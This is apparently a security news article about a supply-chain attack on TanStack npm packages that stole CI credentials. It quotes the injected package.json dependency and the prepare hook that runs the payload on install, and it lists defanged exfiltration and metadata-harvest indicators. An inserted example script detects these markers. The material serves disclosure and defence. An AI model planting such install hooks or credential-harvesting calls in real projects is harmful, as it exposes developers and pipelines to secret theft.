Categories: Cyber Security News

84 TanStack npm Packages Compromised in Ongoing Supply-Chain Attack Targeting CI Credentials

A massive supply chain breach has rocked the developer community after malicious actors compromised 84 npm packages within the widely used TanStack ecosystem.

The attackers injected a sophisticated credential-stealing payload designed to silently harvest secrets from continuous integration environments, including GitHub Actions pipelines.

Packages such as React Router, downloaded over 12 million times weekly, were among those modified, exposing millions of development pipelines to credential theft at a global scale.

Security analysts at Socket reported that their AI-powered scanner flagged all compromised package artifacts within just six minutes of initial publication.

The attack is part of a rapidly expanding malware campaign dubbed Mini Shai-Hulud, which has since spread beyond npm to infect packages across the Python Package Index.

High-profile targets, including OpenSearch, Mistral AI, Guardrails AI, and UiPath, were subsequently confirmed as infected.

A taunting message left on the attacker’s infrastructure, signed by TeamPCP, boasted that credentials had been actively stolen for hours while the investigation was underway.

84 npm TanStack Packages Compromised in Supply Chain Breach

At the heart of the compromise sits a heavily obfuscated script, router_init.js, which functions as a self-contained supply-chain worm.

The payload uses extensive string rotation and hex encoding to evade static analysis. Once executed, it detaches silently from the parent terminal and sweeps the environment for secrets, specifically targeting GitHub Actions workflow tokens, AWS metadata endpoints, Kubernetes service account certificates, and HashiCorp Vault clusters.

The malware injects a malicious optionalDependencies block into the victim project’s package.json, pointing to a standalone malicious GitHub commit:

{
  "optionalDependencies": {
    "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
  }
}

Because npm automatically runs the prepare lifecycle hook when resolving git-based dependencies, the tanstack_runner.js payload executes immediately during npm install, silently infecting the developer’s machine or CI pipeline:

{
  "scripts": {
    "prepare": "bun run tanstack_runner.js && exit 1"
  }
}
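A defender-side check for the two injection markers described above (a git-pinned entry in optionalDependencies and a lifecycle hook that launches an unexpected runner file), added here as an example; it is not code from the article, Socket, or TanStack. The sample package.json object is constructed from the blocks quoted above, and the suspect file names are the ones this article reports.

```javascript
// Added example: audit a parsed package.json object for the injection pattern
// described in the article. Not code from the article, Socket, or TanStack.
const SUSPECT_FILES = ["router_init.js", "router_runtime.js", "tanstack_runner.js"];
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish"];
const DEP_FIELDS = ["dependencies", "devDependencies", "optionalDependencies", "peerDependencies"];

// A git specifier resolves to a repository commit instead of a registry tarball,
// and npm runs that dependency's prepare hook after cloning it.
function isGitSpecifier(spec) {
  if (/^(github|gitlab|bitbucket|gist):/.test(spec)) return true;   // hosted shorthand
  if (/^git(\+(ssh|https?|file))?:\/\//.test(spec)) return true;    // git URLs
  return /^[\w.-]+\/[\w.-]+(#.*)?$/.test(spec);                      // bare owner/repo[#ref]
}

// Returns a list of findings; an empty list means neither marker was seen.
function auditPackageJson(pkg) {
  const findings = [];
  for (const field of DEP_FIELDS) {
    for (const [name, spec] of Object.entries(pkg[field] || {})) {
      if (typeof spec === "string" && isGitSpecifier(spec)) {
        findings.push({ kind: "git-dependency", field, name, spec });
      }
    }
  }
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = (pkg.scripts || {})[hook];
    if (!cmd) continue;
    const hit = SUSPECT_FILES.find((f) => cmd.includes(f));
    if (hit) {
      findings.push({ kind: "lifecycle-runs-suspect-file", hook, file: hit, cmd });
    } else if (/\bexit 1\b/.test(cmd)) {
      // The quoted hook forces a non-zero exit after the payload runs, so a
      // lifecycle script that deliberately fails is worth a look on its own.
      findings.push({ kind: "lifecycle-forced-failure", hook, cmd });
    }
  }
  return findings;
}

// Constructed sample mirroring the two injected blocks quoted in the article.
const samplePkg = {
  name: "victim-app",
  dependencies: { "@tanstack/react-router": "^1.0.0" },
  optionalDependencies: {
    "@tanstack/setup": "github:tanstack/router#79ac49eedf774dd4b0cfa308722bc463cfe5885c"
  },
  scripts: { prepare: "bun run tanstack_runner.js && exit 1", test: "vitest" }
};

console.log(JSON.stringify(auditPackageJson(samplePkg), null, 2));
```

Run it against every package.json in a checkout (including those under node_modules) to find both the injected dependency and the hook that launches the runner.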

Rather than using traditional command-and-control servers, stolen credentials are exfiltrated through the Session decentralized peer-to-peer network, making malicious traffic appear nearly identical to standard encrypted messaging.

For persistence, the malware writes hidden copies of itself into Claude Code and Visual Studio Code configuration directories, ensuring the stealer restarts every time a developer opens their workspace.

Pipeline Propagation in Chained Actions Attacks

TanStack maintainers published a postmortem attributing the breach to a chained attack against their GitHub Actions pipeline.

Attackers exploited a vulnerable pull_request_target workflow pattern to poison the cache and execute malicious code during automated testing.

Critically, the threat actors did not steal static npm publishing tokens; instead, they extracted runtime OpenID Connect tokens directly from the runner process memory, allowing them to authenticate through trusted publisher bindings and push poisoned updates to the npm registry.

TanStack has since deprecated all affected versions, purged workflow caches, and implemented strict repository guards.

Developers are strongly urged to audit their environments for unexpected script files and rotate all cloud credentials immediately.

Indicators of Compromise (IOCs)

| Type | Indicator | Description |
| --- | --- | --- |
| File | router_init.js / router_runtime.js | Primary worm payload |
| SHA256 | ab4fcadaec49c03278063dd269ea5eef82d24f2124a8e15d7b90f2fa8601266c | router_init.js hash |
| SHA1 | 12ed9a3c1f73617aefdb740480695c04405d7b4b | router_init.js hash |
| MD5 | 833fd59ebe66a4449982c6d18db656b4 | router_init.js hash |
| File | tanstack_runner.js | Secondary runner payload |
| SHA256 | 2ec78d556d696e208927cc503d48e4b5eb56b31abc2870c2ed2e98d6be27fc96 | tanstack_runner.js hash |
| SHA1 | e7d582b98ca80690883175470e96f703ef6dc497 | tanstack_runner.js hash |
| MD5 | b82e54923f7e440664d2d75bd31588ca | tanstack_runner.js hash |
| URL | hxxp://filev2[.]getsession[.]org/file/ | C2 exfiltration endpoint |
| URL | hxxp://169[.]254[.]169[.]254/latest/api/token | AWS EC2 IMDSv2 token harvest |
| URL | hxxp://169[.]254[.]170[.]2 | AWS ECS metadata credential harvest |
| URL | hxxps://api[.]github[.]com/repos/ | GitHub secrets enumeration |
| URL | hxxps://registry[.]npmjs[.]org/-/npm/v1/tokens | npm token validation |
| Host | vault[.]svc[.]cluster[.]local:8200 | In-cluster HashiCorp Vault endpoint |

Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

The post 84 TanStack npm Packages Compromised in Ongoing Supply-Chain Attack Targeting CI Credentials appeared first on Cyber Security News.
